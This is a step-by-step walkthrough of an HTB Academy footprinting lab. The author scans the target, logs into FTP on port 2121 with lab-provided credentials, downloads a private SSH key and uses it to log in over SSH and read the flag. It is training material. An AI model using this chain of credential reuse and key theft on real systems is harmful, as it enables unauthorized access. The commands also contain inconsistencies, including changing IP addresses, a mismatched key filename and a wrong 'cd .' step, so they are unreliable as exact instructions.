HTB Academy: Footprinting Lab - Easy

Right off the bat, there were credentials provided to us: ceil:qwer1234

They also included a note about target employees discussing SSH keys in a public forum online

1. I'm going to start by initiating an nmap scan to discover open ports, services, and service versions

    sudo nmap -sV -sC -vv -p- 10.129.35.86

2. After receiving the results, I see ports 21, 22, 53, 2121 are open running FTP, SSH, DNS, and a FTP proxy  

3. I am going to attempt to log into the FTP server using the credentials provided at the beginning of the lab 

4. Connecting to FTP server via port 21 is unsuccessful using Ceil's credentials provided

5. I am going to attempt to connect to the FTP server via port 2121 and log in with Ceil's credentials

    ftp 10.129.35.86 2121

    user

    ceil

    qwer1234

5. The login was successful. I am now going to list out the files present on the working directory

    ls

6. There are no files listed in the present working directory. I am going to try one more command to display hidden files

    ls -la

7. This shows several hidden files/directories in the current working directory. Already, we can scope out the ".ssh" file as a POI considering it likely contains SSH keys that we can manipulate to grant us access to the target servers. I am now going to download all of the files available onto my host device after disconnecting from the FTP server

    exit

    wget -m --no-passive ftp://ceil:qwer1234@10.129.35.86

8. Once completed, I am now going to list out the files/directories in our current working directory

    

    ls

9. I am going to move into the directory 10.129.25. 86

    cd 10.129.26.86

10. I am unable to access any of the files downloaded from the FTP server. I am going to try and download them from the proxy via port 2121

    

    wget -m --no-passive ftp://ceil:qwer1234@10.129.35.86:2121

   

11. The download was successful and stored the files in a directory called "10.129.35.86:2121" found on "/~". I am now going to enter the directory and show all hidden files

    cd 10.129.35.86:2121 

    ls -la

12. Now I am going to go into the .ssh directory and list the files present

    cd .ssh

    ls -la

13. I can see that there are several files available to us, authorized_keys, id_rsa, and id_rsa.pub. id_rsa is of most interest to us as I can use it to access the machine via ssh. I am now going to move the file to my Desktop directory.

    mv id_rsa /home/htb-ac-732254/Desktop

14.Next I am going to change the permissions of the SSH key before using it to connect to the server via SSH

    chmod 600 id_rsa

    ssh -i private.key ceil@10.129.35.85

15. Now that I have successfully connected to the server via SSH, I am going to attempt to find the "flag.txt" file. First, I am going to see what directory I'm currently working in

    pwd

16. After identifying the current working directory, I will now check to see if there are any directories/files within the directory I'm currently working in

    ls -la

17. After identifying that there are no directories/files contained in my current working directory, I'm going to move up one to see what files are contained

    cd . 

    ls -la

    cd flag

    cat flag.txt